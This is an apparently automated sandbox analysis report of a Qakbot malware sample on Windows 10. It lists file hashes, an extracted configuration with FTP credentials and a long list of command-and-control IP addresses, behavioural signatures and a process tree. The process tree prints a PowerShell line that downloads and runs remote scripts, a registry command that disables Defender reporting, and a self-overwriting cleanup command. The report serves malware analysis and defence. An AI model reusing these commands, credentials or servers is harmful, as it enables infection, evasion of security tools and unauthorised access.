Analysis
-
max time kernel
150s -
max time network
127s -
platform
windows10-2004_x64 -
resource
win10v2004-20240508-en -
resource tags
arch:x64arch:x86image:win10v2004-20240508-enlocale:en-usos:windows10-2004-x64system -
submitted
10-05-2024 21:10
Static task
static1
Behavioral task
behavioral1
Sample
310e65a59d3c670bc2bededf7ddef03e_JaffaCakes118.exe
Resource
win7-20240221-en
Behavioral task
behavioral2
Sample
310e65a59d3c670bc2bededf7ddef03e_JaffaCakes118.exe
Resource
win10v2004-20240508-en
General
-
Target
310e65a59d3c670bc2bededf7ddef03e_JaffaCakes118.exe
-
Size
596KB
-
MD5
310e65a59d3c670bc2bededf7ddef03e
-
SHA1
77153c24512610f9ff8e00bf944a9fee8c8f2974
-
SHA256
5cfbe018afa45304fb2d7775f635101ee4226ba594bb30cc0e5c017fd1d30da1
-
SHA512
b2d7f3c16fa3f080a72b02b70319b1ab821a8910851e33e4655784f5371931782d58c92a2ddf37d0f5e429133b84481743f9b80a357e6a2615206c5e323d61a8
-
SSDEEP
6144:BwzoiTihMxUxXH/64Hlh64tEfqpoSliPic7p0mO2WDJNkHtcvvwzRfI5aCieTVU:GzhTicUxlGUxoVPi79qHteyfIEeT
Malware Config
Extracted
https://www.dropbox.com/s/41zf98knyy5atko/001_01.ps1?dl=1
https://www.dropbox.com/s/dh8flnrogfq1h1w/001.ps1?dl=1
Extracted
qakbot
322.358
mc06
1527585056
Protocol: ftp- Host:
37.60.244.211 - Port:
21 - Username:
[email protected] - Password:
4AsEzIaMwi2d
Protocol: ftp- Host:
198.38.77.162 - Port:
21 - Username:
[email protected] - Password:
kJm6DKVPfyiv
Protocol: ftp- Host:
61.221.12.26 - Port:
21 - Username:
[email protected] - Password:
346HZGCMlwecz9S
Protocol: ftp- Host:
67.222.137.18 - Port:
21 - Username:
[email protected] - Password:
p4a8k6fE1FtA3pR
Protocol: ftp- Host:
107.6.152.61 - Port:
21 - Username:
[email protected] - Password:
RoP4Af0RKAAQ74V
71.168.229.249:995
216.21.168.27:32101
216.218.74.196:443
46.177.55.119:443
66.222.48.40:443
93.108.180.227:443
47.40.29.239:443
184.180.157.203:2222
47.40.208.189:443
71.168.229.249:443
216.93.143.182:995
98.16.70.197:2222
75.127.141.50:995
96.248.15.254:995
74.87.248.174:2222
75.189.235.216:443
66.42.182.18:995
50.252.93.122:995
105.187.37.52:443
190.137.254.188:443
87.243.48.172:443
180.180.128.42:995
68.188.1.58:2078
67.83.122.112:2222
98.26.2.182:443
67.53.168.82:465
24.228.185.224:2222
75.110.87.185:443
68.46.145.243:443
74.88.210.56:995
173.81.42.136:443
68.207.36.211:443
185.219.83.73:443
47.223.85.190:443
190.185.219.110:443
24.100.46.201:2222
189.175.114.33:443
207.178.109.161:443
68.49.120.179:443
216.201.159.118:443
98.103.2.226:443
68.129.231.84:443
173.196.11.46:2222
70.94.109.57:443
66.189.228.49:995
98.242.248.219:443
72.215.129.5:443
71.190.202.120:443
67.42.92.9:443
67.238.217.83:443
47.157.103.78:2222
173.174.99.140:443
174.69.127.91:2083
68.133.47.150:443
24.175.99.25:443
184.90.44.223:443
144.163.12.226:443
68.113.142.24:465
71.1.31.71:443
75.135.8.120:443
65.173.74.217:2083
65.191.128.99:443
108.52.246.252:443
98.196.241.224:443
98.114.192.168:443
46.175.87.126:443
67.191.37.156:995
100.4.217.81:995
75.190.161.194:443
71.48.223.84:995
67.55.174.194:443
66.169.54.3:2222
68.206.133.7:443
73.227.31.181:995
73.40.24.158:443
24.6.31.163:443
173.209.20.200:443
97.70.85.248:443
50.80.129.234:443
65.169.66.123:2222
71.120.176.61:443
108.35.23.218:443
68.132.69.132:443
98.22.2.124:443
70.177.31.170:443
72.178.197.227:995
76.112.162.208:443
71.77.129.242:443
72.178.198.87:443
75.139.54.233:443
97.82.249.61:443
173.80.75.177:443
24.93.104.154:443
47.186.93.228:443
71.85.121.110:443
72.178.195.240:995
68.228.118.130:32100
71.85.72.9:443
208.104.163.142:443
68.74.206.211:465
68.228.32.150:443
98.243.166.148:443
47.221.46.163:443
68.207.48.140:443
72.183.161.77:443
104.33.252.147:443
47.134.180.77:443
99.197.182.183:443
75.106.233.194:443
76.101.165.66:443
70.118.18.242:443
70.169.12.141:443
77.122.224.184:995
173.160.3.209:443
73.18.9.164:443
73.58.60.60:443
70.21.182.149:2222
24.175.103.122:995
24.163.66.146:443
24.187.255.116:993
12.166.108.82:995
69.193.199.50:995
47.48.236.98:2222
24.45.182.71:2222
24.209.130.208:443
70.182.79.66:443
68.35.68.112:443
173.86.63.222:995
24.97.19.14:443
68.173.55.51:443
96.69.89.156:995
71.32.89.35:61200
63.79.135.0:443
69.145.82.204:443
76.16.122.156:443
66.68.188.203:443
76.169.73.234:443
174.195.142.124:443
72.178.203.107:443
107.15.153.110:443
24.42.164.2:22
50.198.141.161:2078
206.169.107.58:995
75.109.193.173:2222
173.248.25.11:443
96.73.55.193:993
75.109.193.173:1194
75.109.193.173:2087
Signatures
-
Blocklisted process makes network request 1 IoCs
Processes:
powershell.exeflow pid process 21 4176 powershell.exe -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
310e65a59d3c670bc2bededf7ddef03e_JaffaCakes118.exedescription ioc process Key value queried \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\Control Panel\International\Geo\Nation 310e65a59d3c670bc2bededf7ddef03e_JaffaCakes118.exe -
Executes dropped EXE 2 IoCs
Processes:
aehup.exeaehup.exepid process 1268 aehup.exe 2008 aehup.exe -
Adds Run key to start application 2 TTPs 1 IoCs
Processes:
explorer.exedescription ioc process Set value (str) \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\gtimv = "\"C:\\Users\\Admin\\AppData\\Roaming\\Microsoft\\Aehupe\\aehup.exe\"" explorer.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Checks SCSI registry key(s) 3 TTPs 12 IoCs
SCSI information is often read in order to detect sandboxing environments.
Processes:
310e65a59d3c670bc2bededf7ddef03e_JaffaCakes118.exeaehup.exedescription ioc process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_QEMU&PROD_QEMU_DVD-ROM\4&215468A5&0&010000 310e65a59d3c670bc2bededf7ddef03e_JaffaCakes118.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Service 310e65a59d3c670bc2bededf7ddef03e_JaffaCakes118.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_DADY&PROD_HARDDISK\4&215468A5&0&000000 310e65a59d3c670bc2bededf7ddef03e_JaffaCakes118.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\DeviceDesc aehup.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Service aehup.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_DADY&PROD_HARDDISK\4&215468A5&0&000000 aehup.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\DeviceDesc aehup.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\DeviceDesc 310e65a59d3c670bc2bededf7ddef03e_JaffaCakes118.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\DeviceDesc 310e65a59d3c670bc2bededf7ddef03e_JaffaCakes118.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Service 310e65a59d3c670bc2bededf7ddef03e_JaffaCakes118.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_QEMU&PROD_QEMU_DVD-ROM\4&215468A5&0&010000 aehup.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Service aehup.exe -
Modifies registry class 4 IoCs
Processes:
RuntimeBroker.exedescription ioc process Key created \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\PersistedStorageItemTable RuntimeBroker.exe Key created \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\PersistedStorageItemTable\ManagedByApp RuntimeBroker.exe Key created \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\PersistedStorageItemTable\MostRecentlyUsed RuntimeBroker.exe Key created \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\PersistedStorageItemTable\CurrentWorkingDirectory RuntimeBroker.exe -
Runs ping.exe 1 TTPs 1 IoCs
-
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
310e65a59d3c670bc2bededf7ddef03e_JaffaCakes118.exe310e65a59d3c670bc2bededf7ddef03e_JaffaCakes118.exeaehup.exepowershell.exeaehup.exeexplorer.exesihost.exesvchost.exetaskhostw.exeExplorer.EXEsvchost.exeStartMenuExperienceHost.exeRuntimeBroker.exeRuntimeBroker.exeRuntimeBroker.exeTextInputHost.exemsedge.exemsedge.exemsedge.exemsedge.exeRuntimeBroker.exeRuntimeBroker.exepid process 1112 310e65a59d3c670bc2bededf7ddef03e_JaffaCakes118.exe 1112 310e65a59d3c670bc2bededf7ddef03e_JaffaCakes118.exe 5072 310e65a59d3c670bc2bededf7ddef03e_JaffaCakes118.exe 5072 310e65a59d3c670bc2bededf7ddef03e_JaffaCakes118.exe 5072 310e65a59d3c670bc2bededf7ddef03e_JaffaCakes118.exe 5072 310e65a59d3c670bc2bededf7ddef03e_JaffaCakes118.exe 1268 aehup.exe 1268 aehup.exe 4176 powershell.exe 4176 powershell.exe 4176 powershell.exe 2008 aehup.exe 2008 aehup.exe 2008 aehup.exe 2008 aehup.exe 3636 explorer.exe 3636 explorer.exe 2828 sihost.exe 2828 sihost.exe 3636 explorer.exe 3636 explorer.exe 2968 svchost.exe 2968 svchost.exe 2976 taskhostw.exe 2976 taskhostw.exe 3432 Explorer.EXE 3432 Explorer.EXE 3572 svchost.exe 3572 svchost.exe 3844 StartMenuExperienceHost.exe 3936 RuntimeBroker.exe 3936 RuntimeBroker.exe 3456 RuntimeBroker.exe 3456 RuntimeBroker.exe 4368 RuntimeBroker.exe 4368 RuntimeBroker.exe 776 TextInputHost.exe 3288 msedge.exe 3288 msedge.exe 3896 msedge.exe 3896 msedge.exe 3764 msedge.exe 4848 msedge.exe 4848 msedge.exe 2968 svchost.exe 2968 svchost.exe 4716 RuntimeBroker.exe 4716 RuntimeBroker.exe 3856 RuntimeBroker.exe 3856 RuntimeBroker.exe 3572 svchost.exe 3572 svchost.exe 3636 explorer.exe 3636 explorer.exe 2968 svchost.exe 2968 svchost.exe 3636 explorer.exe 3636 explorer.exe 3572 svchost.exe 3572 svchost.exe 3636 explorer.exe 3636 explorer.exe 2968 svchost.exe 2968 svchost.exe -
Suspicious behavior: MapViewOfSection 1 IoCs
Processes:
aehup.exepid process 1268 aehup.exe -
Suspicious use of AdjustPrivilegeToken 5 IoCs
Processes:
powershell.exeExplorer.EXEdescription pid process Token: SeDebugPrivilege 4176 powershell.exe Token: SeShutdownPrivilege 3432 Explorer.EXE Token: SeCreatePagefilePrivilege 3432 Explorer.EXE Token: SeShutdownPrivilege 3432 Explorer.EXE Token: SeCreatePagefilePrivilege 3432 Explorer.EXE -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
310e65a59d3c670bc2bededf7ddef03e_JaffaCakes118.exeaehup.execmd.exeexplorer.exedescription pid process target process PID 1112 wrote to memory of 5072 1112 310e65a59d3c670bc2bededf7ddef03e_JaffaCakes118.exe 310e65a59d3c670bc2bededf7ddef03e_JaffaCakes118.exe PID 1112 wrote to memory of 5072 1112 310e65a59d3c670bc2bededf7ddef03e_JaffaCakes118.exe 310e65a59d3c670bc2bededf7ddef03e_JaffaCakes118.exe PID 1112 wrote to memory of 5072 1112 310e65a59d3c670bc2bededf7ddef03e_JaffaCakes118.exe 310e65a59d3c670bc2bededf7ddef03e_JaffaCakes118.exe PID 1112 wrote to memory of 1268 1112 310e65a59d3c670bc2bededf7ddef03e_JaffaCakes118.exe aehup.exe PID 1112 wrote to memory of 1268 1112 310e65a59d3c670bc2bededf7ddef03e_JaffaCakes118.exe aehup.exe PID 1112 wrote to memory of 1268 1112 310e65a59d3c670bc2bededf7ddef03e_JaffaCakes118.exe aehup.exe PID 1112 wrote to memory of 1856 1112 310e65a59d3c670bc2bededf7ddef03e_JaffaCakes118.exe reg.exe PID 1112 wrote to memory of 1856 1112 310e65a59d3c670bc2bededf7ddef03e_JaffaCakes118.exe reg.exe PID 1112 wrote to memory of 4176 1112 310e65a59d3c670bc2bededf7ddef03e_JaffaCakes118.exe powershell.exe PID 1112 wrote to memory of 4176 1112 310e65a59d3c670bc2bededf7ddef03e_JaffaCakes118.exe powershell.exe PID 1268 wrote to memory of 2008 1268 aehup.exe aehup.exe PID 1268 wrote to memory of 2008 1268 aehup.exe aehup.exe PID 1268 wrote to memory of 2008 1268 aehup.exe aehup.exe PID 1112 wrote to memory of 768 1112 310e65a59d3c670bc2bededf7ddef03e_JaffaCakes118.exe cmd.exe PID 1112 wrote to memory of 768 1112 310e65a59d3c670bc2bededf7ddef03e_JaffaCakes118.exe cmd.exe PID 1112 wrote to memory of 768 1112 310e65a59d3c670bc2bededf7ddef03e_JaffaCakes118.exe cmd.exe PID 768 wrote to memory of 552 768 cmd.exe PING.EXE PID 768 wrote to memory of 552 768 cmd.exe PING.EXE PID 768 wrote to memory of 552 768 cmd.exe PING.EXE PID 1268 wrote to memory of 3636 1268 aehup.exe explorer.exe PID 1268 wrote to memory of 3636 1268 aehup.exe explorer.exe PID 1268 wrote to memory of 3636 1268 aehup.exe explorer.exe PID 1268 wrote to memory of 3636 1268 aehup.exe explorer.exe PID 3636 wrote to memory of 2828 3636 explorer.exe sihost.exe PID 3636 wrote to memory of 2828 3636 explorer.exe sihost.exe PID 3636 wrote to memory of 2828 3636 explorer.exe sihost.exe PID 3636 wrote to memory of 2968 3636 explorer.exe svchost.exe PID 3636 wrote to memory of 2968 3636 explorer.exe svchost.exe PID 3636 wrote to memory of 2968 3636 explorer.exe svchost.exe PID 3636 wrote to memory of 2976 3636 explorer.exe taskhostw.exe PID 3636 wrote to memory of 2976 3636 explorer.exe taskhostw.exe PID 3636 wrote to memory of 2976 3636 explorer.exe taskhostw.exe PID 3636 wrote to memory of 3432 3636 explorer.exe Explorer.EXE PID 3636 wrote to memory of 3432 3636 explorer.exe Explorer.EXE PID 3636 wrote to memory of 3432 3636 explorer.exe Explorer.EXE PID 3636 wrote to memory of 3572 3636 explorer.exe svchost.exe PID 3636 wrote to memory of 3572 3636 explorer.exe svchost.exe PID 3636 wrote to memory of 3572 3636 explorer.exe svchost.exe PID 3636 wrote to memory of 3748 3636 explorer.exe DllHost.exe PID 3636 wrote to memory of 3748 3636 explorer.exe DllHost.exe PID 3636 wrote to memory of 3748 3636 explorer.exe DllHost.exe PID 3636 wrote to memory of 3844 3636 explorer.exe StartMenuExperienceHost.exe PID 3636 wrote to memory of 3844 3636 explorer.exe StartMenuExperienceHost.exe PID 3636 wrote to memory of 3844 3636 explorer.exe StartMenuExperienceHost.exe PID 3636 wrote to memory of 3936 3636 explorer.exe RuntimeBroker.exe PID 3636 wrote to memory of 3936 3636 explorer.exe RuntimeBroker.exe PID 3636 wrote to memory of 3936 3636 explorer.exe RuntimeBroker.exe PID 3636 wrote to memory of 4020 3636 explorer.exe SearchApp.exe PID 3636 wrote to memory of 4020 3636 explorer.exe SearchApp.exe PID 3636 wrote to memory of 4020 3636 explorer.exe SearchApp.exe PID 3636 wrote to memory of 3456 3636 explorer.exe RuntimeBroker.exe PID 3636 wrote to memory of 3456 3636 explorer.exe RuntimeBroker.exe PID 3636 wrote to memory of 3456 3636 explorer.exe RuntimeBroker.exe PID 3636 wrote to memory of 4368 3636 explorer.exe RuntimeBroker.exe PID 3636 wrote to memory of 4368 3636 explorer.exe RuntimeBroker.exe PID 3636 wrote to memory of 4368 3636 explorer.exe RuntimeBroker.exe PID 3636 wrote to memory of 776 3636 explorer.exe TextInputHost.exe PID 3636 wrote to memory of 776 3636 explorer.exe TextInputHost.exe PID 3636 wrote to memory of 776 3636 explorer.exe TextInputHost.exe PID 3636 wrote to memory of 3288 3636 explorer.exe msedge.exe PID 3636 wrote to memory of 3288 3636 explorer.exe msedge.exe PID 3636 wrote to memory of 3288 3636 explorer.exe msedge.exe PID 3636 wrote to memory of 3896 3636 explorer.exe msedge.exe PID 3636 wrote to memory of 3896 3636 explorer.exe msedge.exe
Processes
-
C:\Windows\system32\sihost.exesihost.exe1⤵
- Suspicious behavior: EnumeratesProcesses
PID:2828
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc1⤵
- Suspicious behavior: EnumeratesProcesses
PID:2968
-
C:\Windows\system32\taskhostw.exetaskhostw.exe {222A245B-E637-4AE9-A93F-A59CA119A75E}1⤵
- Suspicious behavior: EnumeratesProcesses
PID:2976
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3432 -
C:\Users\Admin\AppData\Local\Temp\310e65a59d3c670bc2bededf7ddef03e_JaffaCakes118.exe"C:\Users\Admin\AppData\Local\Temp\310e65a59d3c670bc2bededf7ddef03e_JaffaCakes118.exe"2⤵
- Checks computer location settings
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:1112 -
C:\Users\Admin\AppData\Local\Temp\310e65a59d3c670bc2bededf7ddef03e_JaffaCakes118.exe"C:\Users\Admin\AppData\Local\Temp\310e65a59d3c670bc2bededf7ddef03e_JaffaCakes118.exe" /C3⤵
- Checks SCSI registry key(s)
- Suspicious behavior: EnumeratesProcesses
PID:5072 -
C:\Users\Admin\AppData\Roaming\Microsoft\Aehupe\aehup.exeC:\Users\Admin\AppData\Roaming\Microsoft\Aehupe\aehup.exe3⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of WriteProcessMemory
PID:1268 -
C:\Users\Admin\AppData\Roaming\Microsoft\Aehupe\aehup.exe"C:\Users\Admin\AppData\Roaming\Microsoft\Aehupe\aehup.exe" /C4⤵
- Executes dropped EXE
- Checks SCSI registry key(s)
- Suspicious behavior: EnumeratesProcesses
PID:2008 -
C:\Windows\SysWOW64\explorer.exeC:\Windows\SysWOW64\explorer.exe4⤵
- Adds Run key to start application
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:3636 -
C:\Windows\system32\reg.exeC:\Windows\system32\reg.exe ADD "HKLM\SOFTWARE\Microsoft\Microsoft AntiMalware\SpyNet" /f /t REG_DWORD /v "SpyNetReporting" /d "0"3⤵PID:1856
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe "IEX (New-Object Net.WebClient).DownloadString('https://www.dropbox.com/s/41zf98knyy5atko/001_01.ps1?dl=1'); IEX (New-Object Net.WebClient).DownloadString('https://www.dropbox.com/s/dh8flnrogfq1h1w/001.ps1?dl=1'); Invoke-MainWorker -Command 'C:\Users\Admin\AppData\Local\Temp\mharlqxsphmtnmrgcqbpshzjhd.txt'"3⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4176 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c ping.exe -n 6 127.0.0.1 & type "C:\Windows\System32\calc.exe" > "C:\Users\Admin\AppData\Local\Temp\310e65a59d3c670bc2bededf7ddef03e_JaffaCakes118.exe"3⤵
- Suspicious use of WriteProcessMemory
PID:768 -
C:\Windows\SysWOW64\PING.EXEping.exe -n 6 127.0.0.14⤵
- Runs ping.exe
PID:552
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc1⤵
- Suspicious behavior: EnumeratesProcesses
PID:3572
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}1⤵PID:3748
-
C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca1⤵
- Suspicious behavior: EnumeratesProcesses
PID:3844
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
PID:3936
-
C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca1⤵PID:4020
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵
- Suspicious behavior: EnumeratesProcesses
PID:3456
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵
- Suspicious behavior: EnumeratesProcesses
PID:4368
-
C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\InputApp\TextInputHost.exe"C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\InputApp\TextInputHost.exe" -ServerName:InputApp.AppX9jnwykgrccxc8by3hsrsh07r423xzvav.mca1⤵
- Suspicious behavior: EnumeratesProcesses
PID:776
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --no-startup-window1⤵
- Suspicious behavior: EnumeratesProcesses
PID:3288 -
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=124.0.6367.118 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=124.0.2478.80 --initial-client-data=0x238,0x23c,0x240,0x234,0x260,0x7ffbfd89ceb8,0x7ffbfd89cec4,0x7ffbfd89ced02⤵
- Suspicious behavior: EnumeratesProcesses
PID:3896 -
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=2256,i,5711962389779687290,1245653010537220991,262144 --variations-seed-version --mojo-platform-channel-handle=2124 /prefetch:22⤵
- Suspicious behavior: EnumeratesProcesses
PID:3764 -
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=1948,i,5711962389779687290,1245653010537220991,262144 --variations-seed-version --mojo-platform-channel-handle=2424 /prefetch:32⤵
- Suspicious behavior: EnumeratesProcesses
PID:4848 -
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=2404,i,5711962389779687290,1245653010537220991,262144 --variations-seed-version --mojo-platform-channel-handle=3336 /prefetch:82⤵PID:3632
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --field-trial-handle=4176,i,5711962389779687290,1245653010537220991,262144 --variations-seed-version --mojo-platform-channel-handle=4100 /prefetch:82⤵PID:1572
-
C:\Windows\system32\backgroundTaskHost.exe"C:\Windows\system32\backgroundTaskHost.exe" -ServerName:CortanaUI.AppX3bn25b6f886wmg6twh46972vprk9tnbf.mca1⤵PID:4896
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵
- Suspicious behavior: EnumeratesProcesses
PID:4716
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵
- Suspicious behavior: EnumeratesProcesses
PID:3856
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local StateFilesize
47KB
MD511b47e74dc0dcb35df32bd7eda4bafa9
SHA1f7712ef8034bf5ebe191a0d1fa0ff2d2c56018fd
SHA256ef1666a43273ec68e4a04c2274e03a45e2365d4ccae40b70d11542054860f8cd
SHA51291b0ffe75a66c12402f7f280bb6fc10456301136263f0d7a36d3544e0746b843dc809b4bea74fdd350475dc76e447b6c56202ce534c3aecbc0698f3652691154
-
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_2shvbiyq.ghu.ps1Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
C:\Users\Admin\AppData\Roaming\Microsoft\Aehupe\aehu.datFilesize
92B
MD56bc7e90319080872ea7ba9b18d821155
SHA1cbe2b2ce9a1267986a672207f7bbdfe067689bc5
SHA25627eee1a25a4e6ec5f10e408550df291f846ca63ac51ba3d66a5fd0846d8481e6
SHA512c879842629acdd57bce3a0175e360dd36391f693e057c38e960dea8d7abc345c4f221a27a3070a63ffb1c1010bbd00a780b91afb7595a51e883862f7c77fe6df
-
C:\Users\Admin\AppData\Roaming\Microsoft\Aehupe\aehup.exeFilesize
596KB
MD5310e65a59d3c670bc2bededf7ddef03e
SHA177153c24512610f9ff8e00bf944a9fee8c8f2974
SHA2565cfbe018afa45304fb2d7775f635101ee4226ba594bb30cc0e5c017fd1d30da1
SHA512b2d7f3c16fa3f080a72b02b70319b1ab821a8910851e33e4655784f5371931782d58c92a2ddf37d0f5e429133b84481743f9b80a357e6a2615206c5e323d61a8
-
C:\Users\Admin\AppData\Roaming\Microsoft\Aehupe\aehup32.dllFilesize
357B
MD532ea6b0edb3702440a576ab7c1e8f776
SHA1401c6c83e558c08b49ba819e6dc66f07dfa5a21b
SHA2567b102b8219bb1f4bddb398e8e4405811bb5a29afc6b31506dfb83fcc2dcbc455
SHA5122c98beedadbd5d2989944687c575ba8d64db21aa8b406e967153978cc3d19bf3d0378358f4902016a53b11bef3830fd99a884b85ee99d8394a77cc5f3ebe7d68
-
memory/776-85-0x0000000000330000-0x000000000035C000-memory.dmpFilesize
176KB
-
memory/1112-2-0x0000000000400000-0x0000000000498000-memory.dmpFilesize
608KB
-
memory/1112-40-0x0000000000400000-0x0000000000498000-memory.dmpFilesize
608KB
-
memory/1112-0-0x00000000005C0000-0x00000000005C6000-memory.dmpFilesize
24KB
-
memory/1112-32-0x0000000000400000-0x0000000000498000-memory.dmpFilesize
608KB
-
memory/1268-18-0x0000000000680000-0x0000000000686000-memory.dmpFilesize
24KB
-
memory/1268-42-0x0000000000400000-0x0000000000498000-memory.dmpFilesize
608KB
-
